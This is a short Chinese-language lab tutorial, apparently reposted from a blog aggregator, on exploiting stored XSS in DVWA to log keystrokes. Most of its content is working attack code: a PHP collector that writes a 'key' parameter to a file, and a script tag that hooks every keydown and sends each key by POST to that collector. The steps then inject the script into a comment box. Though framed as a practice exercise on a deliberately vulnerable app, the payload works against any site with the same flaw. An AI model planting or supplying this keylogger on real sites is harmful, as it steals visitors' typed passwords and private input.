實驗環境：DVWA

實驗原理：網頁被植入xss腳本，普通用戶訪問此網頁時，該用戶在當前頁面上所有的鍵盤按鍵都會被記錄下來，并且發送到遠端服務器

實驗步驟：

一、在服務器創建一個keylog.php文件獲取鍵盤記錄，并將記錄寫入key.txt中。

php代碼如下：

<?php $file=fopen("key.txt","a"); if(isset($_REQUEST['key'])){$key=$_REQUEST['key'];fputs($file,$key); } ?>

二、編寫js腳本

<script>window.onkeydown=function(ev){xhr =new XMLHttpRequest();xhr.open('POST','http://localhost/xss/keylog/keylog.php',true);xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');xhr.send('key='+String.fromCharCode(ev.keyCode)); } </script>

三、打開低級別DVWA，選擇儲存xss模塊，將js腳本寫入留言框，執行代碼

四、可看到當在輸入框輸入內容時，key.txt已經將鍵盤記錄下來了

總結

以上是生活随笔為你收集整理的XSS漏洞利用——键盘记录的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。